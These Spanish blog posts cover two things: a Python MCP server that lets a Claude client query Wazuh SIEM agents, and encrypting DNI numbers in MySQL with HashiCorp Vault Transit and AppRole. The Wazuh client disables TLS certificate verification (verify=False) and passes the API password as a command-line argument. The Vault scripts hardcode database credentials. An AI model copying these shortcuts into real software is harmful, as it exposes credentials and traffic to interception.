🛟 Arquitectura

Vamos a tener un servidor SIEM con dos maquinas reportando. Un servidor Ubuntu y uno Microsoft. Luego tendremos que configurar el cliente de Claude.io para que se conecte a mi servidor MCP que sera el encargado de dialogar con Wazuh y responder en base los datos que tenemos en nuestro Index.

🛜 Servidor MCP

Esta version, en Python, es algo muy acotado. Recomiendo ver las referencias, al pie del articulo, para tener todo el poder de esta clase de implementaciones.

#!/usr/bin/env python3
"""
Wazuh MCP Server
Servidor MCP (Model Context Protocol) para integración con Wazuh
"""

import asyncio
import json
import logging
import sys
import os
import argparse
import signal
import time
from typing import Any, Dict, List, Optional, Union
from datetime import datetime
from abc import ABC, abstractmethod

# Verificar dependencias
try:
    import httpx
except ImportError:
    print("Error: httpx no está instalado. Ejecuta: pip install httpx", file=sys.stderr)
    sys.exit(1)

# ============================================================================
# CONFIGURACIÓN Y UTILIDADES
# ============================================================================

def setup_unbuffered_streams():
    """Configurar streams sin buffer para mejor logging"""
    sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', buffering=1)
    sys.stderr = os.fdopen(sys.stderr.fileno(), 'w', buffering=1)


def setup_logging(debug: bool = False, log_name: str = "wazuh-mcp") -> logging.Logger:
    """
    Configurar sistema de logging

    Args:
        debug: Habilitar modo debug
        log_name: Nombre del logger

    Returns:
        Logger configurado
    """
    setup_unbuffered_streams()

    # Directorio y archivo de log
    log_dir = os.path.dirname(os.path.abspath(__file__))
    timestamp = datetime.now().strftime("%Y%m%d_%H%M")
    log_file = os.path.join(log_dir, f'{log_name}_{timestamp}.log')

    # Formatters
    file_formatter = logging.Formatter(
        '%(asctime)s | %(levelname)-8s | %(name)-15s | %(message)s',
        datefmt='%H:%M:%S'
    )
    console_formatter = logging.Formatter(
        '%(asctime)s | %(levelname)s | %(message)s',
        datefmt='%H:%M:%S'
    )

    # Handlers
    file_handler = logging.FileHandler(log_file)
    file_handler.setFormatter(file_formatter)

    console_handler = logging.StreamHandler(sys.stderr)
    console_handler.setFormatter(console_formatter)

    # Logger principal
    logger = logging.getLogger(log_name)
    logger.setLevel(logging.DEBUG if debug else logging.INFO)
    logger.addHandler(file_handler)
    logger.addHandler(console_handler)

    logger.info(f"Logging inicializado - Archivo: {log_file}")
    return logger


# ============================================================================
# EXCEPCIONES PERSONALIZADAS
# ============================================================================

class WazuhMCPException(Exception):
    """Excepción base para Wazuh MCP Server"""
    pass


class AuthenticationError(WazuhMCPException):
    """Error de autenticación"""
    pass


class APIError(WazuhMCPException):
    """Error en petición API"""
    def __init__(self, message: str, status_code: int = None, response_text: str = None):
        super().__init__(message)
        self.status_code = status_code
        self.response_text = response_text


class ToolExecutionError(WazuhMCPException):
    """Error en ejecución de herramienta"""
    pass


# ============================================================================
# CLIENTE WAZUH
# ============================================================================

class WazuhClient:
    """Cliente asíncrono para la API de Wazuh"""

    def __init__(self, wazuh_url: str, username: str, password: str):
        self.wazuh_url = wazuh_url.rstrip('/')
        self.username = username
        self.password = password
        self.token: Optional[str] = None
        self.logger = logging.getLogger("wazuh-client")

        # Cliente HTTP optimizado
        self.client = httpx.AsyncClient(
            verify=False,
            timeout=httpx.Timeout(15.0, connect=5.0),
            limits=httpx.Limits(max_keepalive_connections=5, max_connections=10)
        )

        self.logger.info(f"WazuhClient inicializado para {self.wazuh_url}")

    async def authenticate(self) -> bool:
        """
        Autenticar con la API de Wazuh

        Returns:
            True si la autenticación es exitosa

        Raises:
            AuthenticationError: Si la autenticación falla
        """
        try:
            start_time = time.time()
            auth_url = f"{self.wazuh_url}/security/user/authenticate"
            self.logger.info(f"Autenticando en: {auth_url}")

            auth = httpx.BasicAuth(self.username, self.password)
            response = await self.client.get(
                auth_url,
                auth=auth,
                headers={"Content-Type": "application/json"}
            )

            elapsed = (time.time() - start_time) * 1000
            self.logger.info(f"Respuesta de auth en {elapsed:.0f}ms - Status: {response.status_code}")

            if response.status_code != 200:
                error_msg = f"Autenticación fallida: {response.text[:200]}"
                self.logger.error(error_msg)
                raise AuthenticationError(error_msg)

            data = response.json()
            self.token = data['data']['token']
            self.logger.info("Autenticación exitosa")
            return True

        except httpx.RequestError as e:
            error_msg = f"Error en petición de auth: {e}"
            self.logger.error(error_msg)
            raise AuthenticationError(error_msg)
        except Exception as e:
            error_msg = f"Error de autenticación: {e}"
            self.logger.error(error_msg)
            raise AuthenticationError(error_msg)

    async def make_request(
        self, 
        endpoint: str, 
        method: str = "GET", 
        params: Optional[Dict] = None,
        retry_auth: bool = True
    ) -> Dict[str, Any]:
        """
        Realizar petición autenticada a la API de Wazuh

        Args:
            endpoint: Endpoint de la API
            method: Método HTTP
            params: Parámetros de la petición
            retry_auth: Si reintentar con nueva auth en 401

        Returns:
            Datos de respuesta

        Raises:
            APIError: Si la petición falla
        """
        if not self.token:
            self.logger.info("Sin token, autenticando...")
            await self.authenticate()

        headers = {"Authorization": f"Bearer {self.token}"}
        url = f"{self.wazuh_url}{endpoint}"
        start_time = time.time()

        self.logger.debug(f"{method} {endpoint}")

        try:
            response = await self._execute_request(method, url, headers, params)
            elapsed = (time.time() - start_time) * 1000
            self.logger.info(f"{endpoint} - {elapsed:.0f}ms")

            response.raise_for_status()
            return response.json()

        except httpx.HTTPStatusError as e:
            if e.response.status_code == 401 and retry_auth:
                self.logger.warning("Token expirado, re-autenticando...")
                await self.authenticate()
                headers = {"Authorization": f"Bearer {self.token}"}
                response = await self._execute_request(method, url, headers, params)
                response.raise_for_status()
                return response.json()

            error_msg = f"HTTP Error {e.response.status_code}: {e}"
            self.logger.error(error_msg)
            raise APIError(error_msg, e.response.status_code, e.response.text)

        except httpx.RequestError as e:
            error_msg = f"Error de petición: {e}"
            self.logger.error(error_msg)
            raise APIError(error_msg)

    async def _execute_request(
        self, 
        method: str, 
        url: str, 
        headers: Dict, 
        params: Optional[Dict]
    ) -> httpx.Response:
        """Ejecutar petición HTTP"""
        if method.upper() == "GET":
            return await self.client.get(url, headers=headers, params=params)
        elif method.upper() == "POST":
            return await self.client.post(url, headers=headers, json=params)
        else:
            return await self.client.request(method, url, headers=headers, params=params)

    async def close(self):
        """Cerrar el cliente HTTP"""
        await self.client.aclose()
        self.logger.info("Cliente cerrado")

    async def __aenter__(self):
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        await self.close()


# ============================================================================
# HERRAMIENTAS BASE
# ============================================================================

class BaseTool(ABC):
    """Clase base para herramientas MCP"""

    def __init__(self, wazuh_client: WazuhClient):
        self.wazuh_client = wazuh_client
        self.logger = logging.getLogger(f"tool-{self.name}")

    @property
    @abstractmethod
    def name(self) -> str:
        """Nombre de la herramienta"""
        pass

    @property
    @abstractmethod
    def description(self) -> str:
        """Descripción de la herramienta"""
        pass

    @property
    @abstractmethod
    def input_schema(self) -> Dict[str, Any]:
        """Schema de entrada de la herramienta"""
        pass

    @abstractmethod
    async def execute(self, arguments: Dict[str, Any]) -> str:
        """
        Ejecutar la herramienta

        Args:
            arguments: Argumentos de la herramienta

        Returns:
            Salida de la herramienta como string
        """
        pass

    def to_dict(self) -> Dict[str, Any]:
        """Convertir herramienta a definición MCP"""
        return {
            "name": self.name,
            "description": self.description,
            "inputSchema": self.input_schema
        }


# ============================================================================
# HERRAMIENTAS ESPECÍFICAS
# ============================================================================

class AgentsSummaryTool(BaseTool):
    """Obtener resumen rápido de todos los agentes Wazuh"""

    @property
    def name(self) -> str:
        return "agents_summary"

    @property
    def description(self) -> str:
        return "Obtener resumen rápido de todos los agentes Wazuh"

    @property
    def input_schema(self) -> Dict[str, Any]:
        return {
            "type": "object",
            "properties": {},
            "additionalProperties": False
        }

    async def execute(self, arguments: Dict[str, Any]) -> str:
        result = await self.wazuh_client.make_request(
            "/agents",
            params={"limit": 100, "select": "id,name,status,ip,os.name"}
        )

        agents = result.get('data', {}).get('affected_items', [])
        total = result.get('data', {}).get('total_affected_items', 0)

        # Contar por estado
        active = sum(1 for a in agents if a.get('status') == 'active')
        disconnected = sum(1 for a in agents if a.get('status') == 'disconnected')
        never = sum(1 for a in agents if a.get('status') == 'never_connected')

        response = "🔍 **Resumen de Agentes Wazuh**\n\n"
        response += f"**Total:** {total} agentes\n\n"
        response += f"**Estado:**\n"
        response += f"• Activos: {active}\n"
        response += f"• Desconectados: {disconnected}\n"
        response += f"• Nunca conectados: {never}\n"

        if active > 0:
            response += f"\n**Muestra de Agentes Activos:**\n"
            for agent in [a for a in agents if a.get('status') == 'active'][:5]:
                response += f"• {agent['name']} ({agent['id']}) - {agent['ip']}\n"

        return response


class ActiveAgentsTool(BaseTool):
    """Listar solo agentes activos"""

    @property
    def name(self) -> str:
        return "active_agents"

    @property
    def description(self) -> str:
        return "Listar solo agentes activos"

    @property
    def input_schema(self) -> Dict[str, Any]:
        return {
            "type": "object",
            "properties": {
                "limit": {
                    "type": "integer",
                    "description": "Máximo número de agentes a retornar (default 10)",
                    "default": 10
                }
            },
            "additionalProperties": False
        }

    async def execute(self, arguments: Dict[str, Any]) -> str:
        limit = arguments.get('limit', 10)
        result = await self.wazuh_client.make_request(
            "/agents",
            params={"status": "active", "limit": limit}
        )

        agents = result.get('data', {}).get('affected_items', [])

        response = f"🟢 **Agentes Activos** ({len(agents)} mostrados)\n\n"
        for agent in agents:
            response += f"**{agent.get('name')}** (ID: {agent.get('id')})\n"
            response += f"• IP: {agent.get('ip')}\n"
            response += f"• OS: {agent.get('os', {}).get('name', 'Desconocido')}\n"
            response += f"• Versión: {agent.get('version')}\n\n"

        return response


class SearchAgentTool(BaseTool):
    """Buscar agentes por nombre o IP"""

    @property
    def name(self) -> str:
        return "search_agent"

    @property
    def description(self) -> str:
        return "Buscar agentes por nombre o IP"

    @property
    def input_schema(self) -> Dict[str, Any]:
        return {
            "type": "object",
            "properties": {
                "query": {
                    "type": "string",
                    "description": "Término de búsqueda"
                }
            },
            "required": ["query"],
            "additionalProperties": False
        }

    async def execute(self, arguments: Dict[str, Any]) -> str:
        query = arguments.get('query')
        result = await self.wazuh_client.make_request(
            "/agents",
            params={"search": query}
        )

        agents = result.get('data', {}).get('affected_items', [])

        if agents:
            response = f"🔍 **Resultados de búsqueda para '{query}':**\n\n"
            for agent in agents:
                status_emoji = "🟢" if agent.get('status') == 'active' else "🔴"
                response += f"{status_emoji} **{agent.get('name')}**\n"
                response += f"• ID: {agent.get('id')}\n"
                response += f"• Estado: {agent.get('status')}\n"
                response += f"• IP: {agent.get('ip')}\n\n"
        else:
            response = f"❌ No se encontraron agentes que coincidan con '{query}'"

        return response


class ManagerInfoTool(BaseTool):
    """Obtener información del manager Wazuh"""

    @property
    def name(self) -> str:
        return "manager_info"

    @property
    def description(self) -> str:
        return "Obtener información del manager Wazuh"

    @property
    def input_schema(self) -> Dict[str, Any]:
        return {
            "type": "object",
            "properties": {},
            "additionalProperties": False
        }

    async def execute(self, arguments: Dict[str, Any]) -> str:
        result = await self.wazuh_client.make_request("/manager/info")
        info = result.get('data', {}).get('affected_items', [{}])[0]

        response = "ℹ️ **Información del Manager Wazuh**\n\n"
        response += f"**Versión:** {info.get('version', 'N/A')}\n"
        response += f"**Instalación:** {info.get('installation_date', 'N/A')}\n"
        response += f"**Tipo:** {info.get('type', 'N/A')}\n"

        # Intentar obtener estado también
        try:
            status_result = await self.wazuh_client.make_request("/manager/status")
            status = status_result.get('data', {}).get('affected_items', [{}])[0]
            response += f"\n**Estado:**\n"
            for key, value in status.items():
                response += f"• {key}: {value}\n"
        except Exception:
            pass

        return response


class AgentDetailsTool(BaseTool):
    """Obtener información detallada de un agente específico"""

    @property
    def name(self) -> str:
        return "agent_details"

    @property
    def description(self) -> str:
        return "Obtener información detallada de un agente específico"

    @property
    def input_schema(self) -> Dict[str, Any]:
        return {
            "type": "object",
            "properties": {
                "agent_id": {
                    "type": "string",
                    "description": "ID del agente"
                }
            },
            "required": ["agent_id"],
            "additionalProperties": False
        }

    async def execute(self, arguments: Dict[str, Any]) -> str:
        agent_id = arguments.get('agent_id')
        result = await self.wazuh_client.make_request(f"/agents/{agent_id}")

        if result.get('data', {}).get('affected_items'):
            agent = result['data']['affected_items'][0]
            status_emoji = "🟢" if agent.get('status') == 'active' else "🔴"

            response = f"{status_emoji} **Detalles del Agente {agent_id}**\n\n"
            response += f"**Nombre:** {agent.get('name')}\n"
            response += f"**Estado:** {agent.get('status')}\n"
            response += f"**IP:** {agent.get('ip')}\n"
            response += f"**OS:** {agent.get('os', {}).get('name', 'N/A')} {agent.get('os', {}).get('version', '')}\n"
            response += f"**Versión:** {agent.get('version')}\n"
            response += f"**Registro:** {agent.get('dateAdd')}\n"
            response += f"**Última conexión:** {agent.get('lastKeepAlive')}\n"
        else:
            response = f"❌ Agente {agent_id} no encontrado"

        return response


# ============================================================================
# REGISTRO DE HERRAMIENTAS
# ============================================================================

class ToolRegistry:
    """Registro para gestionar herramientas"""

    def __init__(self):
        self._tools: Dict[str, BaseTool] = {}
        self.logger = logging.getLogger("tool-registry")

    def register(self, tool: BaseTool):
        """Registrar una herramienta"""
        self._tools[tool.name] = tool
        self.logger.info(f"Herramienta registrada: {tool.name}")

    def get_tool(self, name: str) -> BaseTool:
        """Obtener herramienta por nombre"""
        if name not in self._tools:
            raise ToolExecutionError(f"Herramienta desconocida: {name}")
        return self._tools[name]

    def list_tools(self) -> List[Dict[str, Any]]:
        """Listar todas las herramientas registradas"""
        return [tool.to_dict() for tool in self._tools.values()]

    async def execute_tool(self, name: str, arguments: Dict[str, Any]) -> str:
        """Ejecutar herramienta por nombre"""
        tool = self.get_tool(name)
        try:
            self.logger.info(f"Ejecutando herramienta: {name}")
            result = await tool.execute(arguments)
            self.logger.info(f"Herramienta {name} completada exitosamente")
            return result
        except Exception as e:
            self.logger.error(f"Herramienta {name} falló: {e}")
            raise ToolExecutionError(f"Herramienta {name} falló: {e}")


# ============================================================================
# SERVIDOR MCP
# ============================================================================

class WazuhMCPServer:
    """Servidor MCP para Wazuh"""

    def __init__(self, wazuh_client: WazuhClient):
        self.wazuh_client = wazuh_client
        self.message_count = 0
        self.tool_registry = ToolRegistry()
        self.logger = logging.getLogger("mcp-server")

        # Registrar herramientas
        self._register_tools()

        self.logger.info("Servidor MCP inicializado")

    def _register_tools(self):
        """Registrar todas las herramientas disponibles"""
        tools = [
            AgentsSummaryTool(self.wazuh_client),
            ActiveAgentsTool(self.wazuh_client),
            SearchAgentTool(self.wazuh_client),
            ManagerInfoTool(self.wazuh_client),
            AgentDetailsTool(self.wazuh_client)
        ]

        for tool in tools:
            self.tool_registry.register(tool)

    async def handle_message(self, message: Dict) -> Optional[Dict]:
        """
        Manejar mensajes MCP entrantes

        Args:
            message: Mensaje MCP

        Returns:
            Respuesta MCP o None
        """
        self.message_count += 1
        method = message.get("method")
        params = message.get("params", {})
        msg_id = message.get("id")

        self.logger.info(f"[{self.message_count}] Procesando: {method}")

        try:
            if method == "initialize":
                self.logger.info("Inicializando servidor...")
                return {
                    "jsonrpc": "2.0",
                    "id": msg_id,
                    "result": {
                        "protocolVersion": "2024-11-05",
                        "capabilities": {"tools": {}},
                        "serverInfo": {
                            "name": "wazuh-mcp",
                            "version": "2.0.0"
                        }
                    }
                }

            elif method == "notifications/initialized":
                self.logger.info("Servidor inicializado")
                return None

            elif method == "tools/list":
                self.logger.info("Listando herramientas...")
                return {
                    "jsonrpc": "2.0",
                    "id": msg_id,
                    "result": {
                        "tools": self.tool_registry.list_tools()
                    }
                }

            elif method == "tools/call":
                return await self.handle_tool_call(params, msg_id)

            else:
                self.logger.warning(f"Método desconocido: {method}")
                if msg_id:
                    return {
                        "jsonrpc": "2.0",
                        "id": msg_id,
                        "error": {
                            "code": -32601,
                            "message": f"Método no encontrado: {method}"
                        }
                    }
                return None

        except Exception as e:
            self.logger.error(f"Error en {method}: {e}")
            if msg_id:
                return {
                    "jsonrpc": "2.0",
                    "id": msg_id,
                    "error": {
                        "code": -32603,
                        "message": str(e)
                    }
                }
            return None

    async def handle_tool_call(self, params: Dict, msg_id: str) -> Dict:
        """
        Manejar llamadas a herramientas

        Args:
            params: Parámetros de la llamada
            msg_id: ID del mensaje

        Returns:
            Respuesta MCP
        """
        tool_name = params.get("name")
        arguments = params.get("arguments", {})

        self.logger.info(f"Herramienta: {tool_name}")

        try:
            response = await self.tool_registry.execute_tool(tool_name, arguments)

            return {
                "jsonrpc": "2.0",
                "id": msg_id,
                "result": {
                    "content": [
                        {
                            "type": "text",
                            "text": response
                        }
                    ]
                }
            }

        except ToolExecutionError as e:
            return {
                "jsonrpc": "2.0",
                "id": msg_id,
                "error": {
                    "code": -32601,
                    "message": str(e)
                }
            }
        except Exception as e:
            self.logger.error(f"Error en herramienta: {e}")
            return {
                "jsonrpc": "2.0",
                "id": msg_id,
                "error": {
                    "code": -32603,
                    "message": str(e)
                }
            }


# ============================================================================
# FUNCIÓN PRINCIPAL
# ============================================================================

async def main():
    """Función principal del servidor"""
    parser = argparse.ArgumentParser(description="Wazuh MCP Server v2.0 - Organizado")
    parser.add_argument("--wazuh-url", required=True, help="URL de la API de Wazuh")
    parser.add_argument("--username", required=True, help="Usuario de Wazuh")
    parser.add_argument("--password", required=True, help="Contraseña de Wazuh")
    parser.add_argument("--debug", action="store_true", help="Habilitar logging debug")

    args = parser.parse_args()

    # Configurar logging
    logger = setup_logging(args.debug)

    logger.info("=" * 60)
    logger.info(" WAZUH MCP SERVER v2.0 - ORGANIZADO")
    logger.info("=" * 60)
    logger.info(f" URL: {args.wazuh_url}")
    logger.info(f" Usuario: {args.username}")
    logger.info("=" * 60)

    # Inicializar cliente Wazuh
    wazuh_client = WazuhClient(args.wazuh_url, args.username, args.password)

    # Probar autenticación
    logger.info("Probando autenticación...")
    try:
        if not await wazuh_client.authenticate():
            logger.error("¡Autenticación fallida!")
            await wazuh_client.close()
            return 1
    except Exception as e:
        logger.error(f"Error de autenticación: {e}")
        await wazuh_client.close()
        return 1

    # Inicializar servidor MCP
    mcp_server = WazuhMCPServer(wazuh_client)

    logger.info("¡Servidor listo! Esperando mensajes...")
    logger.info("=" * 60)

    # Manejadores de señales
    def signal_handler(signum, frame):
        logger.info(f"Señal {signum} recibida, cerrando...")
        sys.exit(0)

    signal.signal(signal.SIGTERM, signal_handler)
    signal.signal(signal.SIGINT, signal_handler)

    # Bucle principal de mensajes
    try:
        reader = asyncio.StreamReader()
        protocol = asyncio.StreamReaderProtocol(reader)
        await asyncio.get_event_loop().connect_read_pipe(lambda: protocol, sys.stdin)

        while True:
            try:
                line_bytes = await reader.readline()
                if not line_bytes:
                    logger.info("EOF - Cerrando...")
                    break

                line = line_bytes.decode('utf-8').strip()
                if not line:
                    continue

                try:
                    message = json.loads(line)
                except json.JSONDecodeError as e:
                    logger.error(f"JSON inválido: {e}")
                    continue

                # Manejar mensaje
                response = await mcp_server.handle_message(message)

                # Enviar respuesta si existe
                if response is not None:
                    print(json.dumps(response), flush=True)

            except Exception as e:
                logger.error(f"Error en mensaje: {e}")

    except KeyboardInterrupt:
        logger.info("Interrumpido por usuario")
    except Exception as e:
        logger.error(f"Error del servidor: {e}")
    finally:
        logger.info("Cerrando conexiones...")
        await wazuh_client.close()
        logger.info("Servidor detenido")


if __name__ == "__main__":
    sys.exit(asyncio.run(main()) or 0)

Les dejo las dependencias, para instalar.

anyio==4.10.0
certifi==2025.8.3
h11==0.16.0
httpcore==1.0.9
httpx==0.28.1
idna==3.10
sniffio==1.3.1
typing_extensions==4.15.0

⚙️ Configuración Cliente

La configuración en Claude.io es sencilla. Una vez que tenemos el cliente instalado, vamos a Configuración → Desarrollador y ahí editamos la configuración. En mi caso, es esta:

{
  "mcpServers": {
    "wazuh": {
      "command": "/Users/santiago/Proyects/Wazuh-POC/venv/bin/python3",
      "args": [
        "-u",
        "/Users/santiago/Proyects/Wazuh-POC/wazuh_poc.py",
        "--wazuh-url", "https://IP_TUSERVER:55000",
        "--username", "wazuh",
        "--password", "CONTRASENA_API"
      ],
      "env": {
        "PYTHONUNBUFFERED": "1"
      }
    }
  }
}

💡

En mi caso cree un entorno virtual, para la instalación de dependencias. Por eso ese path.

Reiniciamos el cliente de Claude y verificamos si se logró la conexión al servidor MCP y ¡Voilá!

Primero vamos a revisar nuestro servidor Wazuh, que tiene los dos clientes. Cabe destacar que el mismo servidor de Wazuh se autoreporta.

Ahora haremos búsquedas basadas en nuestras herramientas en el Servidor MCP. Le voy a consultar: ¿Cuántos agentes tengo conectados? y luego: ¿Me das información sobre el AD01?

El poder es ilimitado, solo queda probar y empezar a jugar con nuestro servidor MCP. Si quieres agregar más métodos, basta con revisar la documentación de la API de Wazuh. Espero que disfruten el proceso, como lo hice yo.

💼 Referencias

https://github.com/gbrigandi/mcp-server-wazuh

https://github.com/gensecaihq/Wazuh-MCP-Server

https://www.youtube.com/watch?v=b7aqfI8eLOI&t=657s

Cifrado de Datos Sensibles con Hashicorp Vault

Santiago Fernandez — Mon, 16 Jun 2025 20:27:27 GMT

Una pregunta que siempre aparece cuando trabajamos con bases de datos es: ¿Qué pasa si alguien accede directamente a la base y extrae la información? Si no hay ningún tipo de protección, cualquier dato sensible —como DNIs, CUITs o tarjetas— puede quedar completamente expuesto. Para responder a ese riesgo, armé un proceso paso a paso para proteger esta información utilizando HashiCorp Vault como sistema de cifrado y control de acceso. La solución se integra con una base de datos MySQL y una aplicación desarrollada en Python, aunque el lenguaje es indistinto: lo importante es que todo se hace de forma segura, programática y auditable. Vamos a probar con una app Python para simplificar, pero este enfoque puede aplicarse a cualquier tecnología que pueda integrarse con Vault.

🎯 ¿Qué queríamos lograr?

Cifrar y descifrar DNIs mediante Vault desde una app Python, podria ser el dato que desees.
Guardar los valores cifrados en una base MySQL.
Auditar todos los accesos a Vault (lectura/escritura).
Hacer todo esto de forma segura y programática, sin intervención manual, usando AppRole.

Tabla de MySQL

Cree una base de datos llamada appdb, donde generaremos esta tabla.

CREATE TABLE usuarios (
  id INT AUTO_INCREMENT PRIMARY KEY,
  nombre VARCHAR(100),
  apellido VARCHAR(100),
  dni_cifrado TEXT,
  fecha_creacion TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);

Ya tenemos nuestra base de datos y Vault.

Vault

Perfecto, si ya tenés Vault funcionando, vamos a hacer un paso a paso bien claro para:

Habilitar el motor Transit.
Crear la llave, la llamaremos dni-key.
Crear una política en Vault que permita encriptar y desencriptar.
Crear un Role de AppRole que use esa política.
Obtener el Role ID y el Secret ID para que tu app Python lo use.

Habilitar el motor Transit

vault secrets enable transit

🔑 Crear una clave para cifrado

vault write -f transit/keys/dni-key

Creamos la política en Vault transit-app.hcl

path "transit/keys/dni-key" {
  capabilities = ["create", "read", "update"]
}

path "transit/encrypt/dni-key" {
  capabilities = ["update"]
}

path "transit/decrypt/dni-key" {
  capabilities = ["update"]
}

Creamos el AppRole y la asociamos.

vault auth enable approle

vault write auth/approle/role/python-app \
  token_policies="transit-app" \
  token_ttl=1h \
  token_max_ttl=4h

🧠 ¿Por qué es útil?

Estás limitando el tiempo de vida del token, lo que reduce el impacto si es comprometido.

Asignás una política clara y específica (transit-app), evitando privilegios excesivos.

Te permite mantener el control desde el lado de Vault, y no desde la aplicación.

🔐 Obtenemos Role ID y Secret ID

vault read auth/approle/role/python-app/role-id
vault write -f auth/approle/role/python-app/secret-id

Guardamos el role-id y el secret-id.

Ahora vamos a ver la aplicacion de Python para poder insertar cifrado el DNI, se las dejo aca.

import os
import requests
import mysql.connector
import base64
from dotenv import load_dotenv

# Cargar .env
load_dotenv()

# ======== CONFIG ========
VAULT_ADDR = os.getenv("VAULT_ADDR", "https://vault.esprueba.com")
ROLE_ID = os.getenv("VAULT_ROLE_ID")
SECRET_ID = os.getenv("VAULT_SECRET_ID")
TRANSIT_KEY_NAME = "dni-key"

MYSQL_HOST = "127.0.0.1"
MYSQL_PORT = 3306
MYSQL_USER = "admin"
MYSQL_PASSWORD = "TUPASS"
MYSQL_DATABASE = "appdb"

# ======== VAULT AUTH ========
def get_vault_token():
    url = f"{VAULT_ADDR}/v1/auth/approle/login"
    headers = {"Content-Type": "application/json"}
    data = {"role_id": ROLE_ID, "secret_id": SECRET_ID}
    try:
        resp = requests.post(url, headers=headers, json=data, timeout=10)
        resp.raise_for_status()
        token = resp.json()["auth"]["client_token"]
        return token
    except requests.exceptions.RequestException as e:
        print("❌ Error autenticando en Vault:", e)
        exit(1)

# ======== VAULT ENCRYPT ========
def encrypt_dni(vault_token, dni):
    url = f"{VAULT_ADDR}/v1/transit/encrypt/{TRANSIT_KEY_NAME}"
    headers = {"X-Vault-Token": vault_token}
    dni_b64 = base64.b64encode(dni.encode("utf-8")).decode("utf-8")
    data = {"plaintext": dni_b64}
    try:
        resp = requests.post(url, headers=headers, json=data)
        resp.raise_for_status()
        return resp.json()["data"]["ciphertext"]
    except requests.exceptions.RequestException as e:
        print("❌ Error cifrando DNI:", e)
        exit(1)

# ======== MYSQL INSERT ========
def insertar_usuario(nombre, apellido, dni_cifrado):
    try:
        conn = mysql.connector.connect(
            host=MYSQL_HOST,
            port=MYSQL_PORT,
            user=MYSQL_USER,
            password=MYSQL_PASSWORD,
            database=MYSQL_DATABASE
        )
        cursor = conn.cursor()
        cursor.execute(
            "INSERT INTO usuarios (nombre, apellido, dni_cifrado) VALUES (%s, %s, %s)",
            (nombre, apellido, dni_cifrado)
        )
        conn.commit()
        conn.close()
        print(f"✅ Usuario '{nombre} {apellido}' insertado correctamente.")
    except mysql.connector.Error as err:
        print("❌ Error al conectar con MySQL:", err)
        exit(1)

# ======== VALIDACIÓN DNI ========
def pedir_dni():
    while True:
        dni = input("🪪 Ingresá el DNI (8 dígitos): ").strip()
        if dni.isdigit() and len(dni) == 8:
            return dni
        print("❌ DNI inválido. Debe tener exactamente 8 dígitos numéricos.")

# ======== MAIN ========
if __name__ == "__main__":
    print("🚀 Iniciando carga de usuario...")
    nombre = input("🧑 Ingresá el nombre: ").strip()
    apellido = input("🧑 Ingresá el apellido: ").strip()
    dni = pedir_dni()

    print("🔐 Autenticando con Vault...")
    token = get_vault_token()

    print("🔒 Cifrando DNI...")
    dni_cifrado = encrypt_dni(token, dni)

    print("💾 Insertando en base de datos...")
    insertar_usuario(nombre, apellido, dni_cifrado)

La ejecutamos y uala! Vamos a revisar como impacto en la base de datos.

Ahora les dejo el codigo, para poder revisar el campo.

import os
import mysql.connector
import requests
import base64
from dotenv import load_dotenv

# ======== CONFIGURACIÓN ========
load_dotenv()

VAULT_ADDR = os.getenv("VAULT_ADDR", "https://vault.esprueba.com")
ROLE_ID = os.getenv("VAULT_ROLE_ID")
SECRET_ID = os.getenv("VAULT_SECRET_ID")
VAULT_KEY = "dni-key"

DB_HOST = os.getenv("DB_HOST", "127.0.0.1")
DB_PORT = int(os.getenv("DB_PORT", 3306))
DB_USER = os.getenv("DB_USER", "admin")
DB_PASSWORD = os.getenv("DB_PASSWORD", "TUPASS")
DB_NAME = os.getenv("DB_NAME", "appdb")

# ======== VAULT ========
def get_vault_token():
    print("🔐 Autenticando con Vault via AppRole...")
    try:
        url = f"{VAULT_ADDR}/v1/auth/approle/login"
        payload = {"role_id": ROLE_ID, "secret_id": SECRET_ID}
        resp = requests.post(url, json=payload)
        resp.raise_for_status()
        print("✅ Token obtenido.")
        return resp.json()["auth"]["client_token"]
    except Exception as e:
        print(f"❌ Error autenticando con Vault: {e}")
        exit(1)

def decrypt_dni(vault_token, ciphertext):
    url = f"{VAULT_ADDR}/v1/transit/decrypt/{VAULT_KEY}"
    headers = {"X-Vault-Token": vault_token}
    payload = {"ciphertext": ciphertext}
    try:
        resp = requests.post(url, headers=headers, json=payload)
        resp.raise_for_status()
        plaintext_b64 = resp.json()["data"]["plaintext"]
        dni = base64.b64decode(plaintext_b64).decode("utf-8")
        return dni
    except base64.binascii.Error as e:
        print(f"⚠️ Base64 decode error: {e}")
        print(f"🔍 Base64 recibido de Vault: {plaintext_b64}")
        return ""
    except Exception as e:
        print(f"❌ Error descifrando con Vault: {e}")
        return ""

# ======== MYSQL ========
def get_usuarios():
    try:
        conn = mysql.connector.connect(
            host=DB_HOST,
            port=DB_PORT,
            user=DB_USER,
            password=DB_PASSWORD,
            database=DB_NAME
        )
        cursor = conn.cursor()
        cursor.execute("SELECT nombre, apellido, dni_cifrado FROM usuarios")
        resultados = cursor.fetchall()
        conn.close()
        return resultados
    except mysql.connector.Error as err:
        print("❌ Error al conectar con MySQL:", err)
        exit(1)

# ======== MAIN ========
if __name__ == "__main__":
    vault_token = get_vault_token()

    print("🔍 Buscando usuarios...\n")
    for nombre, apellido, cifrado in get_usuarios():
        print(f"🔎 Descifrando ciphertext de {nombre} {apellido}...")
        dni = decrypt_dni(vault_token, cifrado)
        print(f"👤 {nombre} {apellido} - 🪪 DNI: {dni}")

Aca funcionando con ambos programas.

Este flujo es una forma sencilla pero potente de aplicar seguridad a nivel de aplicación usando HashiCorp Vault. La tokenización o cifrado a través de Vault con transit garantiza que incluso si la base es comprometida, los datos sensibles no sean legibles sin acceso a Vault.

Espero que les sirva.

Vault en producción: configuración HA con Raft

Santiago Fernandez — Sat, 31 May 2025 16:09:40 GMT

Desde hace tiempo me han estado preguntando sobre este tema, así que vamos a crear un clúster de Hashicorp Vault, algo fundamental para una empresa moderna. Una bóveda que nos ayudará a gestionar mejor los secretos y también a reducir los costos de nuestro uso en la nube.

La idea es tener un Hashicorp Vault multinodo con alta disponibilidad, usando raft como almacenamiento backend. De esta forma, podremos ofrecer resiliencia, escalabilidad y seguridad. Además, mostraremos cómo conectarnos a través de la interfaz de usuario y cómo las aplicaciones pueden utilizar esos secretos.

